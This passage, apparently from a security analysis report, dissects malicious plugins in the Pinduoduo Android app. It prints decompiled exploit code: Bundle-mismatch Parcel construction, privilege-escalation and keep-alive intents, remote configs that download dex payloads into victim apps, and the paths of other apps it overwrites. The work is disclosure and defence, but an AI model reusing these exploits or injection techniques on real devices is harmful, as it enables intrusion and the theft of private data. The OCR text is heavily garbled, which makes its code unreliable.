boolean canStartBgActivityByFullScreenNotification(int arg1, boolean arg2); 

void grantAutoStartPermission(); 

int hasAutoStartPermission(); By modifying the system self-start settings to achieve the 
purpose of keeping alive and bypassing the system App hibernation control 

void startBackgroundActivity(Intent arg1); 

void startBackgroundActivityByAlarm(Intent arg 1); 

boolean startBackgroundActivityByAssistant(Intent arg1); 

void startBackgroundActivityByTheme(Intent arg1); 

void startBackgroundByFullScreenNotification(Intent arg1); Bypass system restrictions 
on keep-alive and pullup 


o IDebugCheck DebugCheck(); detects if it is being debugged to escape detection and analysis 


© IDoublelnstance Doublelnstance(); 


o |FileProvider FileProvider(); 


boolean hasAbility(String arg1); 
boolean hasPermission(); 

void startGrantPermission(String arg1); 
List getLauncherlcons(); 

boolean addicon(IconInfo arg1); 


» boolean movelconToFolder(int arg1, int arg2); 
« boolean movelconOutFolder(Iconinfo arg1); 
« boolean updatelcon(IconInfo arg1); 
« boolean removelcon(int arg1); 
» Integer addScreen(); 
» LayoutProps getLayoutProps(); 
= boolean restartLauncher(); 
o |FileProviderV2 FileProviderV2(); * Core component * Gain file access to system applications, 
other applications after exploiting vulnerabilities 
« IFPUtils FileProviderUtils(); 
« Uri getValidUriByScene(String arg1); 
« boolean hasPermission(String arg1); 
« boolean hasPermission(String arg1, String arg2); 
« lIHssLocalDataManager hssLocalDataManager(); 
« IHwHiBoardProvider hwHiBoardProvider(); 
= |HwSelfStartProvider hwSelfStartProvider(); 
» IKaelDbOperate kaelDbOperate(); 
« l|OppoAuProvider oppoAuProvider(); 
= l|OppoLauncherProvider oppoLauncherProvider(); 
« lOppoLockDisplayProvider oppoLockDisplayProvider(); 
» lOppoLockPullProvider oppoLockPullProvider(); 
« |IPermQuery permQuery(); 
» void persistPermission(Intent arg1); 
« boolean startGrantPermission(String arg1, String arg2); 
« boolean startGrantPermission(String arg1, String arg2, Intent arg3, String arg4); 
» |XmBehaviorWhiteProvider xmBehaviorwhiteProvider(); 
o IFloatWindow FloatWindow(); get the hover window ability to keep alive 
o IScreenRecordCheck ScreenRecordCheck() detects if a screen is being recorded, evading user 
Forensics or analysis 


Among them, SonaAbility is the core of the whole system, which is packed with several Oday and 1day 
Bundle Mismatch vulnerabilities of various platforms for privilege escalation. Knowledge of this series of 
vulnerabilities can be Found at https://github.com/michalbednarski/ReparcelBug and 
https://github.com/michalbednarski/IntentsLab/issues/2#issuecomment-344365482, which can be briefly 
described as Follows: 


Common pattern of this type of bugs is Parcelable object write 
(serialization) and read (deserialization) inconsistent, such as a member 
variable written to long, but read to int. We are able to use the evil 
Parcelable object to achieve the Settings system application to send an 
arbitrary Intent to start arbitrary Activity. 


At first time, the ordinary App B serializes the Bundle and passes it to 
the system_server via Binder, and then the system_server triggers 
deserialization through a series of getXXX (e.g. getBoolean, getParcelable) 
functions of the Bundle to get the KEY_INTENT key value of KEY_INTENT - an 
intent object - for security check. 

If the check is passed, it will call writeBundle for the second 


serialization, then the deserialization in Settings regains 
{KEY_INTENT: intent} and calls startActivity. 


If the second serialization and deserialization process do not match, it is 
possible that the malicious {KEY_INTENT:intent} in Bundle does not appear 
in system_server check, but reappear in Settings, then it perfectly 
bypasses the checkKeyIntent check! 


This type of vulnerability is Favored by PDDs because of the low threshold For stability of exploitation and 
ease of engineering. 


SonaAbility receives Intent wrapped by other components, takes it out in start(SonaRequest), and calls the 
corresponding Oday vulnerability depends on the current android system version and patch level, at 
Following code: 


public SonaResuLlt start(SonaRequest sonaRequest) { 

CO200h m405a; 

Logger .i("SpecialPullAbility.Comp.SonaAbility", "start invoked: " + 
sonaRequest); 

if (sonaRequest == null || 
TextUtils.isEmpty(sonaRequest.getCaLller()) || 
TextUtils.isEmpty(sonaRequest.getRequestId()) || sonaRequest.getIntent() == 
mene) ee 

return new SonaResult(false, "invalid request"); 

J 
if (!m265a(sonaRequest.getCaller(), false)) { 
m405a = new CO200h(false, "caller_not_whitelist"); 
} else if 
(RemoteConfig.instance( ).getBoolean("pinduoduo_Android.alive_sona_startup_a 
b_64500", false) && this.f936e.m246b()) { 

Logger.i("SpecialPullAbility.Comp.SonaAbility", 
"startSpecialActivity by sonaStartUp: %s", new Object[] 
{sonaRequest.toString()}); 

C0245a.m240a("sStart", sonaRequest); 

m405a = this.f936e.m248a(sonaRequest, this.f937Ff); 

C0245a.m239a("result", sonaRequest, m405a, null); 

} else { 

Logger.i("SpecialPullAbility.Comp.SonaAbility", 
"startSpecialActivity by alivePullStartUp: %s", new Object[] 
{sonaRequest.toString()}); 

m405a = this.f935d.m405a(sonaRequest.getIntent()); 

} 

C0245a.m237a("sStart", sonaRequest.getCaller(), null, sonaRequest, 
m405a.m358a(), m405a.m357b()); 

return new SonaResult(m405a.m358a(), m405a.m357b()); 


} 


public boolean isBusy(String str) { 
Logger.i("SpecialPullAbility.Comp.SonaAbility", "isBusy invoked: " 
ae Sele) e 
boolean isCacheIntentBusy = 


AlivePullAbility.instance().isCacheIntentBusy(str); 
C0245a.m237a("isBusy", str, null, null, isCacheIntentBusy, null); 
return isCacheIntentBusy; 


} 


public Bundle makeBundle(Intent intent) { 

if (intent == null) { 
Logger .w("SpecialPullAbility.Comp", "make empty bundle"); 
return new Bundle(); 

2 

Logger.i("SpecialPullAbility.Comp", "make bundle"); 

InterfaceC0194e m404a = m404a(intent, null); 

if (m404a == null) { 
Logger .i("SpecialPullAbility.Comp", "no make bundle function"); 
return Bundle.EMPTY; 

} 

Bundle m375a = m404a.m375a(intent); 

C0253b.m227a(); 

return m375a == null ? Bundle.EMPTY : m375a; 


} 


/* renamed from: c */ 
private boolean isHuaweiVersion() { 
if (RomOsUtil.instance().isNewHuaweiManufacture() | | 
RomOsUtil.instance().isHonerManufacture()) { 
return true: 
i 
return RomOsUtil.instance().isEmui() && 
!AliveAbility.instance( ).isAbilityDisab led2022Q3("hw_small_brand_law"); 


} 


public C0188a() { 
Logger.i("SpecialPullAbility.Comp", "plugin version: %s", new 
Object[]{CO253b.m226b()}); 
this.specialPullAbilityComplmpl = getPlatformPLugin(); 


} 


/* renamed from: d */ 
private boolean m394d(Intent intent, String str) { 
Logger .i("SpecialPullAbility.Comp", "real start accountSettings 
B(GicalWaliaw, / )) 2 
if (CdUtils.m234a()) { 
return CdUtils.m233a(intent, str); 
} 


try { 
BotBaseApp lication. getContext().startActivity(intent); 


(PEEUicin 1eieWke? 

} catch (Exception e) { 
C0245a.m242a("start_account_exception"); 
Logger.e("SpecialPullAbility.Comp", e); 
return false; 


private SpecialPullAbilityCompInterface getPlatformPLlugin() { 
return isHuaweiVersion() ? new AOSPSpecialPullAbilityComp( ) 
RomOsUtil.instance().isOppo() ? new OppoSpecialPullAbilityComp( ) 
RomOsUtil.instance().isSamsung() ? new SamsungSpecialPullAbilityComp( ) 
RomOsUtil.instance().isXiaomiManufacture() ? new 
XiaomiSpecialPullAbilityComp() : RomOsUtil.instance().isVivoManufacture() ? 
new VivoSpeicalPullAbilityComp() : new DummySpecialPullAbilityComp(); 


} 


//HuaweiSpecialPullAbilityComp 
public boolean m371f(Intent intent) { 
Logger.i("SpecialPullAbility.Comp", "real start hw accountSettings 
AUG ealWallewe. 4 )) = 

try { 

BotBaseApp lication. getContext().startActivity(intent); 
Retuinn Crue: 

} catch (Exception e) { 
C0245a.m242a("start_account_exception"); 
Logger.e("SpecialPullAbility.Comp", e); 
return false; 


} 


@Override // 
com. Xunmeng.pinduoduo.android_pull_ability_comp.pullstartup.SpecialPullAbil 
ityComp 
/* renamed from: g */ 
public String mo326g() { 
return "dd.hw"; 


} 


/* renamed from: d */ 

public static Bundle m373d(Intent intent) { 
Bundle bundle = new Bundle(); 
Parcel obtain = Parcel.obtain(); 
Parcel obtain2 = Parcel.obtain(); 
Parcel obtain3 = Parcel.obtain(); 
obtain2.writeInt(3); 
obtain2.writeInt(4); 
obtain2.writeInt(13); 
obtain2.writeInt(3); 
obtain2.writeInt(0); 
obtain2.writeInt(4); 
obtain2.writeString("com.huawei.recsys.aidl.HwObjectContainer"); 
obtain2.writeSerializable(null); 
obtain2.writeInt(4); 


alive_security_biz_plugin: 


File path:bot/alive_security_biz_plugin/mw1.bin IF the previous Plugin is a wrapper for the privilege 
escalation capability, this Plugin is the driver, which exploits the previous capability (and also some new 


vulnerabilities) in various ways to achieve the purpose of keeping alive, stealing privacy data, etc. The 
Plugin contains dozens of Strategies, each of which corresponds to a set of post-exploit operations, which 
are listed as Follows: 


e JayceStrategy 

e WingStrategy 

« CheeseStrategy4Other 
e ShenLawDetectStrategy 
e TalonStrategy 

e ClinkzStrategy 

e BatteryStrategy 

e DazzleStrategy 

e FileProviderProbStrategy 
e RangersStrategy 

¢ BalanarStrategy 

e StripBareStrategy 

e GalaxyStrategyUtils 

e NamiStrategy 

e StrutsStrategyHelper 
e GeorgeStrategy 

¢ CreamStrategy4Other 
e YmirStrategy 

e ZecStrategy 

¢ GalioStrategy 

e MinerStrategy 

e YiStrategy 

e CreamStrategy 

e DianaStrategy 

¢ KarmaStrategy 

e AhriStrategy 

¢ ApolloStrategy 

e DancerStrategy 

e ViStrategy 

e PurgeV2Strategy 

e GhostStrategy 

¢ GalaxyStrategyConfig 
¢ DirgeStrategy 

e SionStartDetectStrategy 
¢« DarchrowStrategy 

e« CheeseStrategy 

e StrutsStrategy 

e WinterStrategy 

e BaseGalaxyStrategyTracker 
e JannaVictimStrategy 
e JessieStrategy 

« MedusaStrategy 

e FioraStrategy 


e ZiggsStrategy 

e ZyraDetectStrategy 

e FakerStrategy 

e SkyCastleStrategy 

e FizzStrategy 

e PermissionClosedStrategy 
e GlassStrategy 

e BannerDetectStrategy 

e NunuStrategy 

e ButterStrategy 

e MiranaStrategy 

e ZedDetectStrategy 

¢ CanvasStrategy 

e WindStrategy 

e NotificationClosedDetectStrategyV2 
e GalaxyStrategy 

e VanishingArtStrategy 

e LeBlancStrategy 

e AniviaStrategy 

e MaoKaiStrategy 

e KnightStrategy 

e TuskStrategy 

e ZeusStrategy 

e KnightV2Strategy 

e WeatherSummaryStrategy 
¢ NotificationClosedDetectStrategy 
e MaginaStrategy 

e MagnusStrategy 

e LuluStrategy 

e TinyStrategy 

¢« BoushStrategyV2 

¢ ClinkStrategy 

e NamiV2Strategy 

¢ BrandStrategy 

e JoaquimStrategy 

e SivirStrategy 

e ZetStrategy 

e SpringStrategy 


As shown above, the various Exps are driven by Event, for example the Following remote profile snippet 
means that when the process enters the background, it executes the Following Strategy 


"ON BACKGROUND": [ 
t 
"name": "Buys" 
ty 
{ 


"name": "KunkkaStrategy" 


tay 
{ 
"name": "AkashaStrategy" 
Ay, 
{ 
"name": "XazeStrategy", 
"overrideFrameworkProps": { 
"blackListProps": { 
"sceneld": "4003" 
} 
} 
ty 
t 
"name": "DarchrowStrategy" 
ty 
{ 
"name": "SniperStrategy" 
t, 
{ 
"name": "AuStrategy" 
} 


], 


It also contains a lot of data collection logic, such as the collector of various user identities and monitoring 
other app's behavior and DAUs 


em unify.ability 
» & dynamic 
m abilities 
hm dataCollect 
fh ability 
) collectors 
activityUsageStats 
lbs 
noti 
© Al1PkgUsageConfig 
>» © AllPkgUsageSdcolle... 
(©, DevInfoCollector 
©, DummyAsyncCollector 
(©, HonorClubIdCollector 
(©, HwLowVerLocationCollector 
(©, HwSdNickNameCollector 
© LowVerWifiInfoCollector 
©, MnfcLoginCollector 
© OppoAssistantScreencoll... 
©, OppoCommunityIdsdcolle... 
©, OppoLowVerLocationColle... 
(©, OppoMarketSearchColle... 
©, OppoSdLocCollector 
> ©, OppoSdNameCollector 
(©, OppoStorageInfoColle... 
© PackageInfo 
> © PhoneServiceBlogHistoryColl... 
© PkgInfo 
©, PkgUsageSdCollector 
© UsageStatsSdConfig 
@, VivoAccountIdColle... 
(©, VivoFeedbackCollector 
» © VivoJoviLlbsCollector 
© VivoMnfcLoginColle... 
©, VivoSdLocCollector 
©, VivoSpsUsageCollector 
©, WeiboFdIdcollector 
© WeiboIdConfig 
(©, WeiboSdNameCollector 
> ©, WifilnfoSdcollector 
© XmUsageStatsConfig 
(© XmVoiceAssistantUsageColl... 
) config 
© CollectorConfig 
©, CollectorConfigItem 
@, CollectorContainer 
© ReportInfoConfig 
©, TimeWindow 
©, CollectorUtil 
“f, CONFIG_KEY_EXISTING_COLLECTORS String 
“f, AB_KEY_NEW_COLLECTORS_DISABLE String 
um, isCollectorDisabledByAliveSalt(String) boolean 


am isExistingCollector(String) boolean 
fe fpPathCheck 


(© FpPathCheck 


smart_shortcut_plugin 


PDD also tries to keep alive and prevent itself from being uninstalled by controlling the Launcher. For 
example, by modifying the layout of Launcher after privilege escalation, adding a Fake shortcut icon and 
hiding the real icon, it can achieve the purpose of anti-installation. Other behaviors include moving the icon 
to the user's usual screen to increase the conversion rate, mimicing other apps' icon, placing a 1*1 hidden 
widget to keep alive etc. Part of its interface is implemented in the plugin, part of it is implemented in the 
main App code, the Plugin interface methods are as follows. 


void addShortcut(String arg1, OnShortcutChangeListener arg2, long arg3, CommonShortCutinfo 

arg4); 

e boolean hasAbility(String arg1, String arg2); 

¢ boolean isShortcutExist(String arg1, boolean arg2, CommonShortCutinfo arg3); 

e void removeShortcut(String arg1, OnShortcutChangeListener arg2, long arg3, CommonShortCutinfo 
arg4); Similar logic exists in com.xunmeng.pinduoduo.smart_widget.SmartWidgetUtils. 

e void addShortcut(String arg1, OnShortcutChangeListener arg2, long arg3, CommonShortCutinfo 
arg4); 

e boolean hasAbility(String arg1, String arg2); 

e boolean isShortcutExist(String arg1, boolean arg2, CommonShortCutinfo arg3); 

e void removeShortcut(String arg1, OnShortcutChangeListener arg2, long arg3, CommonShortCutinfo 

arg4); 


base_secdt_comp_plugin, ct_plugin 


Environment detection. The isEnvUnsafe Function of this module is called in multiple components above, 
which will turn off malicious behavior if Found to be being debugged or hooked, and tries to clear the 
system log, thus escaping analysis. Protection is done through nvwa VMP. 


@ SensitiveBehaviorMonitor ec... ec. isu... @ftain 
@ SensitiveBehaviorstate 
TAG String 
f, mEngineeringModeon 
‘f mScreenRecording 3 
‘f, msystemIsLogging 
i SensitiveBehaviorstate() void 
fy checkState(int) int 
im getAppHookState() in 
i getProcessHookState() int 
Mm getState(Boolean) int 
i getSysPowerMode() int 
 isEnvUnsafe() int 
m isNetworkUnsafe() int 
boost 
@ BoostRequest 
@ HwBooster 


@ IHwBoost 

a /* AX DEBUG: Another dup sti ens count: ([CONST_STR]}, Finally: ([CONST_STR, CONSTRUCTOR, CONST_STR, INVOKE, TNVOKE, CONST_STR, TAVOKE, TNVOKE, ARTTH, INVOKE, TAVOKE, TNVOKE 
ata 23 public int checkState(int i) { 

@ DataCollector long elapsedRealtime - SystemClock.elapsedRealtime() ; 

dplog 25 try ( 
@ DpLogService ac ae 
@ VLogControl s etState(this.ms) j 

@ VLogoumper "CSEC.Pig. SB ate" 4 ie" cost * 4 (SystonClock.olapsedRealtimo() — elapsedkoaltine) ); 
en 


nsitiveBehaviorMonitor @ SensitiveBehaviorstate 


<pinduod ics sec. comp. plugin.bel 


jens io uv 
ehavior/SensitiveBehaviorstate.class *, 


v 

© AppDebuggableDt 

@, Debuggablept 

@ DtRet 

© Emulatordt 

@Envot 
EnvDtManager 

« cs 


i+” cost " + (SystemClock.elapsedRealtime() - elapsedRealtine)); 


@ Networkot 
@ RootDt 

@ Separationpt 
@ Signaturept 
event 

© Event 

@ EventManager 
© EventType 

@ TEventListener 
hook 

@ Breakpointot 
©; Debuggedbt 5 getAppHookstate(); 
@ FastLibscanner ; eseC.Pigsestate®, “tes 
@ FridaDetector [ 

© HookDtManager 
@ HookTracker 
@ Hookutils 

@ Idapt 

@ JRogueDt 

@, NRogueDt 

© ScanRecord 

© SubstrateDetector 7 ) 
@ TweakMeDt s 

© XposedDetector public int getState(soolean bool) { 
model 7 (bool == null) { 

safeguard 
@ ActionUtils 7 peturd botl.tieolesnvalie{) 2 27 @5 

@, ClearsysLog } 

© ClearSysLog$$Lambda$2 — one 

utils 3 

@ MansUtils z 


cost " + (SystemClock.elapsedRealtime() - elapsedRealtine)); 


‘ost “ + (SystenClock.elapsedRealtime() - elapsedRealtine)); 


cost " + (SystemClock.elapsedRealtime() - elapsedRealtime)); 


i+" cost * + (SystemClock.elapsedRealtime() - elapsedRealtime)); 


t " + (SystemClock.elapsedRealtime() - elapsedRealtime)); 


“check state "++" cost " + (SystemClock.elapsedRealtime() - elapsedRealtime)); 


app_sd_thousand_plugin 


This plugin mainly persist backdoors by writing dynamic code files of other apps to hijack the victim apps, 


and Further steal private data of other apps by using system backup function, e.g. WeChat Logs. After 


above plugins successfully exploit system weakness, this plugin will pull the dex File again From the remote 


end, overwrite victim applications’ Files and proceed for Further exploitation. 


AP\|SH\|Q@6@\¢ > |HMO &\a\+ 
pee4hw 
peesbr 
©, GragasHwBrInstantManager 
> @HwBrTrackType 
util 
(© HwCacheutils 
@ Hwedutils 
(©, GragasHiDiskManager 
c, GragasHwManager 
& TAG String 
‘fs allSupportSdSceneList List 
‘fg sdSceneManagerMap Map 
™ GragasHwManager() void 
m checkInjectEncryptApkCondition(String, InjectConfig) bc 
m checkInjectFile(String, InjectConfig, InjectParam) boo: 
m checkOtherCondition(String, InjectConfig) boolean 
m filterCommonConfigResource(String, InjectConfig) void 
m getAllSupportSdSceneList() List 
m getFpScene(String) String 
m getPluginInfo(String) List 
™ getSdSceneManager(String) GragasBaseManager 
m getSdSceneManager(String, boolean) GragasBaseManager 
m™ getSdSceneRequestParam() Map 
m hasInjectedEncryptApk(String, String, InjectConfig) boc 
m inject(String, InjectParam, InjectConfig) InjectResult 
m injectEncryptApk(String, File, InjectConfig) boolean 
m isInjected(String) boolean 
m needPreCheckFp(String) boolean 
needSubmitUesTrack(String, InjectConfig) boolean 
onProcessStart(Context) void 
onReceiveUesResult(String, String, JSONObject) void 
onTriggerEvent(Context, String) void 
registerGrantPermissionReceiver(String) void 
’ SupportDemandFp(String) boolean 
™ supportInject(String) boolean 
(@ GragasIntelligentManager 
@ GragasIntelligentV2Manager 
(@ GragasLocalD1UESManager 
(@ GragasThemeManager 
peesxm 
backup 
crypto 
©, GeneralDigest 
© HMac 
©, KeyParameter 
© Pack 
» ©, PBEParametersGenerator 
ie, PKCS5S2ParametersGenerator 
(©, SHAIDigest 
> @ Strings 
@ BackupPackageUtil 
(©, BackupWork 
> © BRItemUtils 
©, GragasAnalyticsFPManager 
©, GragasAnalyticsUESManager 
©, GragasXMBackupManager 
(©, GragasXmManager 
@ Utils 
© XMConstants 


Fee FF 


3 


(@; SragasAppstoremanager (©, GragasLauncherManager 


1 package com.xunmeng .pinduoduo. sd_1000_v2.gragas-manager .po04hu; 


z 
3 import android.content .Context; 

4 import android.text.TextUtils; 

5 import com.xunmeng. pinduoduo.alive .strategy .interfaces.adapter .proxy .Loggers 

6 import com.xunmeng. pinduoduo.alive .strategy .interfaces.adapter .proxy .StrategyFramework} 
7 import com.xunmeng.pinduoduo.sd_100@_v2.common.util.Utilss 

8 import com.xunmeng.pinduoduo.sd_1000_v2.gragas.entity.InjectConfig; 

3. import com.xunmeng.pinduoduo.sd_1000_v2.gragas.entity.InjectParam; 

® import com.xunmeng.pinduoduo.sd_100@_v2.gragas.entity.InjectResult; 


11 import com.xunmeng.pinduoduo.sd 1000 v2.gragas.entity.SdSceneRequestParam; 
12 impert com.xunmeng.pinduoduo.sd_ 1000 v2.gragas.manager .GragasBaseManager ; 
13 import com.xunmeng.pinduoduo.sd_1000 v2. gragas.manager . pO4hw. podSbr .GragasHwBrInstantManager ; 
14 import com.xunmeng.pinduoduo.sd_1000 v2. gragas.util.GragasCacheUtils; 
15 import java.io.File; 

16 import java.util.ArrayLists 

17 import java.util.HashMap; 

18 import java.util.Iterator; 

19 import java.util. 
20 import java.util.Map; 

21 import org. json. JSONObject; 


ist; 


23 /* renamed from: com.xunmeng.pinduoduo.sd_1000_v2.gragas.manager.hw.GragasHwManager */ 


75 } 


1 


Some example configuration snippets are list as Follows: 


Write backdoors to system applications and other applications such as Douyin(Tiktok China) and NaviMap 


"jinduoduo_Android.ka_strategy_biz_galio_63400_expect_List":{"0":"[\n 


@ VivoOfficialUninstallCommandExecutor 


(© OppoPictor 


/* loaded from: app_sd_thousand_pLugin. jar: com/xunmeng/pinduoduo/sd_1000_v2/gragas/manager/hw/GragasHwManager.class */ 
25 public class GragasHwManager extends GragasBaseManager { 
26 public static String TAG; 
27 public |ist allSupportSdSceneList = new Arraylist()s 
28 public Map sdSceneManagerMap = new Heshiap(); 
30 public GragasHwManager() { 
31 this.allSupportSdSceneList .add("hw intelligent”); 
32 this.allSupportSdSceneList .add("hw_hidisk"); 
33 this.allSupportSdSceneList..add("hw theme”) ; 
34 this.allSupportSdSceneList .add("hw_br_instant"); 
35 ‘this. sdscenemanagermap.put("hw_intelligent”, nul1);J 
36 this.sdSceneManagerMap.put ("hw hidisk", null); 
37 this. sdSceneManagerMap.put("hw_theme", null); 
38 this.sdSceneManagerMap .put (“hw_br_instant", null); 
39 this. sdSceneManagerMap.put("hw_intelligent_ues", null); 
40 this. sdSceneManagerMap.put("hw_hidisk_ues", null); 
al this.sdSceneManagerMap.put("hw_theme_ues", null); 
42 this. sdSceneManagerMap.put("hw_file_mng_ues", null); 
43 } 
a5 public GragasBaseManager getSdSceneManager (String str) { 
return getSdSceneNanager(str, TextUtils .equals(GragasCacheUtils.getLocalinjectConfigexecutelype(str), "ues")); 
a7 } 
49 public GragasBaseManager getSdSceneManager (String str, boolean z) { 
50 GragasLocalD1UESManager gragasLocalD1UESManager = null; 
51 if (|TextUtils.isempty(str)) { 
52 String str2 =z ? str + "_ues" : str} 
53 if (this.sdSceneManagerMap .containsKey(str2)) { 
54 gragasLocalD1UESManager = (GragasBaseManager) this.sdSceneNanagerMap .get(str2) 3 
55 if (gragasLocalD1UESManager == null) { 
56 af (z) { 
57 gragasLocalD1UESManager = new GragasLocalD1UESManager (str); 
58 Logger.i(TAG, "create GragasLocalD1UESManager instance: " + str); 
59 } else if ("hw_intelligent".equalsIgnorecase(str)) { 
60 gragasLocalDIUESManager = new GragasTntelligentV2Manager()3 
61 Logger.i(TAG, "create GragasIntelligentV2Manager instance."); 
62 } else if ("hw_hidisk".equalsIgnoreCase(str)) { 
63 gragasLocalD1UESManager - new GragasHiDiskManager(); 
64 Logger.i(TAG, "create GragasHiDiskManager instance."); 
65 } else if ("hw theme".equalsIgnoreCase(str)) { 
66 gragasLocalD1UESManager = new GragasThemeNanager(); 
67 Logger.i(TAG, "create GragasThemeManager instance.")} 
68 } else if (“hw_br_instant” .equalsignoreCase(str)) { 
69 gragasLocalD1UESManager = new GragasHwBrInstantManager(); 
gragasLocalD1UESManager . init(StrategyFramework. getFrameworkContext()) 5 
71 Logger.i(TAG, "create GragasBrinstantManager instance.")5 
73 if (gragasLocalD1UESManager != null) { 
74 this. sdSceneManagerMap. put (str2, gragasLocalD1UESManager) ; 


\"/data/user/0/com.vivo.browser/app_platform_plugin/34140/notify28.dex\",\n 
\"/data/user/0/com.vivo.browser/app_platform_plugin/34140/process26.dex\", \ 


n \"/data/user/0/com.vivo.contentcatcher/app_apk/subject.apk\",\n 


\"/data/user_de/0/com.vivo.aiengine/files/smartedge/com.vivo.shortvideoinfe 
r1004/dex/shortvideo_infer_1004.apk\",\n 
\"/data/user_de/0/com.vivo.aiengine/cache/extraDexs/vivoruLeengine_extra.zi 


py Xf 


\"/data/user_de/0/com.vivo.aiengine/files/vcode/dex/VCodeImpl.apk\", \n 
\"/data/user/0/com.vivo.voicewakeup/files/vcode/dex/VCodeImpl.apk\", \n 


\"/data/user/0/com.android.bbkmusic/files/16.lrctemplate\", \n 
\"/data/user/0/com.android.bbkmusic/files/17.lrctemplate\", \n 


\"/data/user_de/0/com.vivo.vms/files/vcode/dex/VCodeImpl.apk\", \n 


\"/data/user_de/0/com.vivo.pem/files/vcode/dex/VCodeImpl.apk\", \n 
\"/data/user/0/com.vivo.devicereg/files/vcode/dex/VCodeImpL.apk\", \n 
\"/data/user/0/com.android.vivo.tws.vivotws/files/vcode/dex/VCodeImpl.apk\" 
,\n \"/data/user/0/com.vivo.assistant/files/vcode/dex/VCodeImpl.apk\", \n 
\"/data/user/0/com.vivo.vhome/files/vcode/dex/... 
/data/user/0/com.ss.android.ugc.aweme/files/plugins/com.ss.android.ugc.awem 
e.qrcode_pLuginv2/version-1471990000/apk/base-1.apk\",... 


Pull dex files from remote and execute them in victim application 


ab_sd1000_dynamic_cmd_config_58900:ABExpItem{key='null', value='{ 
2a ed) 

"key_sdtdy_class_name": 
"com.googLle.android.sd.biz_dynamic_dex.sync.SyncExecutor", 

"key_sdtdy_method_name": "execute", 

"key_sdtdy_class_version": "2022071701", 

"key_sdtdy_use_remote_url": false, 

"key_sdtdy_need_Local_file": false, 

"key_sdtdy_remote_url_suffix": "/dynamic/4e824786 -3476-49f4-b/7dd- 
abf4d1d238b3.zip", 

"key_sdtdy_remote_url_type": "1", 

"key_sdtdy_remote_url_md5": "9d8cf69bfe6b86c6261e9687d1552F95", 


"download_url": "https://commfile.pddpic.com/galerie- 
go/spirit/sd1000/dex/f4247da0-6274-44eb -859a-b4c35ecOdd71.dex" 
}, 
Niggas { 


"key_sdtdy_class_name": 
"com.google.android.sd.biz_dynamic_dex.usage_event.UsageEventExecutor", 

"key_sdtdy_class_version": "2023010901", 

"key_sdtdy_method_name": "executeAsync", 

"download_ur Ll": 
"https://commfile.pddpic.com/sdfile/common/b50477f70bd14479a50e6fa34e18b2a0 
.dex" 


}, 


Appendix Il: Description of each Strategy's purpose 
and vendors they attack 


JayceStrategy: get running app list information 

WingStrategy: Self-start on Samsung phones; triggered by PROCESS _START 
CheeseStrategy: on ViVo phones, use content://com.vivo.assistant.upgrade to 
open data/user_de/0/com.vivo.appfilter/databases/afsecure.db, insert 
bring_up_apps apps, etc. to keep alive, triggered by FP_PERM_READY 
CheeseStrategy40ther: On ViVo phones, use 
content://com.vivo.assistant.upgrade to open 


data/user_de/0/com.vivo.appfilter/databases/afsecure.db, insert 
bring_up_apps, etc. to keep alive, triggered by FP_PERM_READY 
ShenLawDetectStrategy: listening for screen event by registering receivers 
TalonStrategy: collect input methods information and exploit input method 
vulnerabilities 
ClinkzStrategy: perform tasks when the screen is off, first check the 
network, the time of the Last execution and other status; specific tasks 
are estimated to be related to vivo_market 
BatteryStrategy:monitor the battery state, send intent when the state 
changes, used to keep alive 
DazzleStrategy: self-boot, wake up, etc. on honor phones 
FileProviderProbStrategy: probe to get the package structure of apk, etc. 
RangersStrategy: use Xiaomi App Market to keep alive, app update, etc. 
works MIUI10 or above 
Intent intent = new Intent(); 
intent.setComponent (new ComponentName("com.xiaomi.market", 
"com.xiaomi.market.ui.JoinActivity")); 
intent.setAction("android.intent.action.VIEw"); 
intent.setData(Uri.parse("market://update") ); 
intent.putExtra("onClickButton", true); 
intent.putExtra("updatePackageList", str); 
intent.putExtra("pageRef", "notification_outstandingUpdate" ); 
intent.putExtra("sid", "default"); 
intent.putExtra("sourcePackage", "com.xiaomi.market"); 
intent.setF lags (-2130685952) ; 
return intent; 


Intent intent = new Intent(); 

intent.setComponent (new ComponentName("com.xiaomi.market", 
"com.xiaomi.market.testsupport.DebugService") ); 

return intent; 


Intent launchIntentForPackage = 
AppListApi.getLaunchIntentForPackage(getContext().getPackageManager(), 
"com.xiaomi.market", "com. 
xunmeng. pinduoduo.active.strategy.biz.plugin.rangers.RangersStrategy"); 

LaunchIntentForPackage.setF Lags(-2130685952) ; 
return LaunchIntentForPackage; 


BalanarStrategy: After screen locked try to join itself into the whitelist 

of applications that're allowed to keep running 

StripBareStrategy : probe pkglist and get related information 

GalaxyStrategy :Get SharedPreferences of other applications 

NamiStrategy: collect various user data 

StrutsStrategyHelper : Create various payload objects based on messages 
RequestPayload requestPayload2 = (RequestPay load) 

this.plLuginJSONFormatUtils.fromJson(messageO.payload.toString(), 

RequestPay load.CLASS_NAME); 

GeorgeStrategy :Change wallpaper on Xiaomi phones, sniffing weather 

application broadcast, etc 

CreamStrategy :add permissions to PDD itself 

CreamStrategy40ther :add permissions to PDD itself: read/write vivo 

content://com.vivo.assistant.upgrade/ open 

data/user_de/%d/com. vivo. permissionmanager/databases/permission.db 


YmirStrategy: Change Huawei power saving options and other modifications 
IDBHandle openDB = 
FileProviderV2.instance().fileProviderUtils().openDB(Uri.parse(getFilePath( 
context, "content://com.android.settings 
.files/my_root/data/user_de/%d/%s/databases/smartpowerprovider.db"))); 
cursor = sQLiteDatabase.query("unifiedpowerapps", null, "pkg name = ?" 
new String[]{str}, null, null, null); 
ZecStrategy: change hover windows, shortcuts, etc.; Oppo phone 
sendBroadcast("com.oppo.launcher", "p", 
"Oppo.intent.action.PACKAGE_SHOW_INFO", String.valueOf(i)); 
if (!ZecUtils.hasPermission(intValue, 1) && 
ZecAB.isZecStoreAbEnable()) { 
Logger.i("LVST2.Biz.Plugin.ZecStrategy", "allow set 
store permission."); 
a, = @) || 2 
} 
if (!ZecUtils.hasPermission(intValue, 4) && 
ZecAB.isZecF LoatwindowAbEnable()) { 
Logger.i("LVST2.Biz.Plugin.ZecStrategy", "allow set 
floatwindow permission."); 
i |= 64; 
} 
if (!ZecUtils.hasPermission(intValue, 32) && 
ZecAB.isZecShortcutAbEnable()) { 
GalioStrategy:read /data/system/package-dex-usage.list so as to get 
information about the installed apps. 
MinerStrategy: find the debug log file on the phone, 
vivo, oppo, xiaomi, samsung,meizu etc. 
YiStrategy: view the top application when recording the screen, avoid being 
recorded 
DianaStrategy: read and write clipboard, a pixel to keep alive; Xiaomi 
KarmaStrategy: collect steps through vendor health applications; Huawei, 
oppo 
AhriStrategy:using Xiaomi voice assistant to perform a number of actions; 
the 
Intent intent2 = new Intent(); 
intent2.setComponent (new 
